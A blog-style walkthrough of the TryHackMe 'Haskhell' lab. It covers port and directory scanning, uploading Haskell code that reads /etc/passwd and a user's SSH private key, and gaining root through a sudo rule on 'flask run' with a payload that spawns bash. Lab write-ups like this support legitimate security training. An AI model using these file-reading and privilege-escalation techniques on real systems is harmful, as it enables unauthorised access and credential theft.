---
layout: post
title:  "THM - Haskhell"
date:   2020-06-30 18:00:00 +1000
category: hacking
---

## Introduction
*Show your professor that his PhD isn't in security.*
Not much to go on there. Haskell is a programming language that I don't know anything about. Let's go!

## Ports
nmap says we've got 22 (SSH) and 5001, which is a non-standard port.
>5001/tcp open  http    syn-ack ttl 63 Gunicorn 19.7.1

Gunicorn is a 'Python Web Server Gateway Interface HTTP server' according to Wikipeda.

## 5001
Visting http://10.10.222.186:5001/ shows we have a webserver running on this port, to do with *Functional Programming 220*. There is a link to /homework1 which contains some instructions, and assigned work is supposed to be submitted to /upload. The upload function supposedly accepts Haskell files only. Unfortunately, the linked /upload returns a 404.

It also says that *Your file will be compiled and ran and all output will be piped to a file under the uploads directory.*

## Dirbusting
>root@kali:/opt/tryhackme/haskhell# gobuster dir -u http://10.10.222.186:5001/ -w /usr/share/dirb/wordlists/common.txt

Running dirbuster with the common wordlist reveals a page called /submit, and that appears to be what the /upload was supposed to be.

Creating a valid haskell file (hello, world of course!), we can upload it:

>module Main  
  where  
main=putStrLn "Hello, World!"  

And actually it gets shown to us:
http://10.10.222.186:5001/uploads/fib.hs

>[1 of 1] Compiling Main             ( /home/flask/uploads/fib.hs, /home/flask/uploads/fib.o )
Linking /home/flask/uploads/fib ...  
Hello, World!  

So, what can we do with that??

Well, we can read a file for a start:  
>main = do  
  s <- readFile "/etc/passwd"  
  doSomethingWith s  
doSomethingWith :: String -> IO ()  
doSomethingWith str = putStrLn str  

>root:x:0:0:root:/root:/bin/bash  
etc...  
haskell:x:1000:1000:haskhell:/home/haskell:/bin/bash  
flask:x:1001:1001::/home/flask:/bin/sh  
prof:x:1002:1002::/home/prof:/bin/sh  

Unfortunately we can't open /etc/shadow :)

We can do some guessing - first I tried /home/prof/.profile, and that worked ... so what if we try /home/prof/.ssh/id_rsa? Bingo!

## Bingo
I won't paste it here, but we've got the private key for 'prof' and once we chmod 600 on it we can login:
>root@kali:/opt/tryhackme/haskhell# ssh -i id_rsa prof@10.10.222.186
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

Prof has the user flag, so that's sweet.

Running sudo -l, prof can do:
>User prof may run the following commands on haskhell:  
    (root) NOPASSWD: /usr/bin/flask run
    
## Flask
Flask is a micro web framework written in Python, so let's make the most super basic Python thing you can imagine:

>prof@haskhell:/root# cat /dev/shm/app.py   
import os  
os.system("/bin/bash")  

Now this **isn't** a flask app, but it doesn't matter. Next, we set our environment variable:
>$ export FLASK_APP=app.py  

And we do this:
>prof@haskhell:/dev/shm$ sudo /usr/bin/flask run  
root@haskhell:/dev/shm# whoami  
root  

Boom. I had so little trouble with this I feel like I must've cheated by guessing the presence of id_rsa, and I didn't consult any walkthroughs. Maybe I'm just levelling up.
